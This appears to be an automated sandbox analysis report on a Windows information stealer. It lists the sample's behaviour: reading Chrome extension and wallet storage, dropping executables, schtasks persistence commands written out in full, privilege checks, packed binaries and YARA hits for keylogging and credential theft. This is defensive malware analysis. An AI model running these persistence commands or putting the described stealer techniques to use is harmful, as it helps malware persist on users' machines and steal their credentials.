file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (7 events)

file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\H86W_nRG_QiDnpacl1Q7.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

Creates a suspicious process (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Drops a binary and executes it (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Local\Temp\00c07260dc\explorgu.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\zdsQt76OWN37K50HOTgL.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\bBd0YznJ45TDQR7kIkRA.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\48GAGLpHe8SfQaAeuUjD.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\27Jq3pCQAGfjWkgZSAJ0.exe
file	C:\Users\test22\AppData\Local\Temp\heidinwBI5Bnh48LP\Ji6eSDaqEh9J_LBdm7Gg.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2768 thread_handle: 0x000001a0 process_identifier: 2764 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a4	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2852 thread_handle: 0x000001ac process_identifier: 2848 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a8	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2360 thread_handle: 0x00000648 process_identifier: 2596 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000654	1	1
CreateProcessInternalW Feb. 13, 2024, 12:17 p.m.	thread_identifier: 2812 thread_handle: 0x000006d0 process_identifier: 2820 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000006c8	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x02b50000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process zara.exe (6 events)

Time & API	Arguments	Status	Return
InternetReadFile Feb. 13, 2024, 12:17 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL¼ÚÊeà"¬ RwÀ @`3@@@d\|@ pà uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcp@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 13, 2024, 12:17 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Rän3@n3@n3@5[A`3@5[Að3@»^A\|3@»^Az3@»^A3@5[Az3@5[A}3@n3@º3@õ]Ao3@õ]u@o3@õ]Ao3@Richn3@PEL²¿eàÜ@Jð@pJºð@Vpj`Ø\ J J PÖ@à.rsrcØ`æ@À.idata pê@À ì@àwklbfgoi 0î@àjmhzvnfb0J@à.taggant0@J"@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 13, 2024, 12:18 p.m.	buffer: MZÿÿ¸@zº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$ @F `@ `F{e`m`ø @ @à.rsrc`2@À.idata 6@À + 8@àszzkuusk +:@àryxhswen @F¼@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 13, 2024, 12:18 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PELÙÅeà"¨>¨:±À@P±@ à6 Xíx à°8@àpÀ"<@à@0^@àpf@àdf@à.rsrcÊ@@x (Ø @à.data "° " @àìêSyÝÿÀ³sÃ¹òhmÃuk¼KoÕ;£7+A¨£þAó@×ëáìCe¥«éùÓ «Â<U§¡$pY¼\|déäwia±b"nmÛ5)Ù,Ôyûæ¼°ó1"$H±ô-i úOlõ§q¨ÈìL¿ÄzîãnG¨`Ý(±Ø¼ÕiNªô3o¥ÝÊ}¦;LÑ"h»&µ=.8è; ç?Û?_OdÝm=Å>ý¼AÛeZáÓôË<ÙÐU"«é¦æAÏí°'Sæ4ºÉ·Öx¡H³ðø³ù+oÆ¦ ÚwóR¸ªZÛkçs3«îùç.Ý¦0ÒU9AA iÕgßÃ¶§æ$WóÌÔ«2ÄB·ÌõN ;Lëëb":Lòøo+ß³¡_Cÿð ÃîöBÞ6ß{Ö¡:ärow7Îq^w2±×eÖ;¦Z¡ÒN4;Ú³ëôå¶:³F Âiú\|ºb¥Þ]?ï9³jrd<8mu`x¬¸áMN¾Kv ô®UÍ/ÿåo ÝLCú[.C¬Éxýr.9l´N»èÜ¾^ï0ÅÎYb Ñ:Ì¬ë.Üi\:GGy³pÉÃ¶ ñ"ÕÏçº2þ¶Õt]®eÅDù6¤Ã<ÏÔp:ÓÉéÊPÇçHÀDG¡hF8!WÖÜßé{túØ³×è½kcgúu¼¤î=û±àÚFøÍ",«ñ@;êÀ Dè2?ÅhÀ³ä÷¬ì¥åá/ÍäïB-°ÛuºÛZø¯i®èþ%8d)$ÿ¢¸C¥÷@ñâ'Ü#ûGyAN$d"o¦;ª´ã 0Ûk§Eï=,éé3¶JÌ,¢<Ñ÷ [jÍ \|g9ÀcA@UÇ²zkj.µC±{iÔÁ²Q4hoÂwî#ÈD{`¹uDÄÊD Ü®Z£TÍ÷aÞ±úGý~Oy-^ðÖo³¶Dz ù#ÏUO9µ\aHk20~ÈS4>ËÙûàÓyÞÅúfx\÷²(ùú³ë¾hù,¥$Ë¨ËÖ?;¾K$y©÷%{ìÇqÿËBÐ1ÉUt#+4${^"¦§Ç+¯=ié²Æ»C[Õg®"âËÁ¢È@È<§¡ÄþWmâ. ßieuÐ±á¨&vwu'6èôÊ¶$ª_(/' request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 13, 2024, 12:18 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"VpW°@ Wù?#@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À @*À @àxrelsbun`>V @àxkaflctw`Wd"@à.taggant0pW"h"@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 13, 2024, 12:18 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL¾ÚÊeà"¬ wÀ @0d@@@d\|@ \|a°uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc\|a@ bô@@.relocu°vV@B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (4 events)

section

{u'size_of_data': u'0x0008ee00', u'virtual_address': u'0x00001000', u'entropy': 7.987542644700559, u'name': u' \\x00 ', u'virtual_size': u'0x00136000'}

entropy

7.9875426447

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00002000', u'virtual_address': u'0x00137000', u'entropy': 7.91327127363527, u'name': u'.rsrc', u'virtual_size': u'0x000110a0'}

entropy

7.91327127364

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001ace00', u'virtual_address': u'0x003fc000', u'entropy': 7.910565781724644, u'name': u'brmsztpq', u'virtual_size': u'0x001ad000'}

entropy

7.91056578172

description

A section with a high entropy has been found

entropy

0.995229835212

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 13, 2024, 12:18 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (50 out of 1136 events)

url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	https://codereview.chromium.org/25305002).
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	https://ct.googleapis.com/aviator/
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	https://ct.googleapis.com/rocketeer/
url	https://www.globalsign.com/repository/03
url	http://www.startssl.com/sfsca.crl0
url	http://UA-Compatible
url	https://se.search.yahoo.com/search?ei=

Yara rule detected in process memory (50 out of 1596 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	browser info stealer	rule	infoStealer_browser_Zero
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Perform crypto currency mining	rule	BitCoin
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Virtual currency	rule	Virtual_currency_Zero

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000004e8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
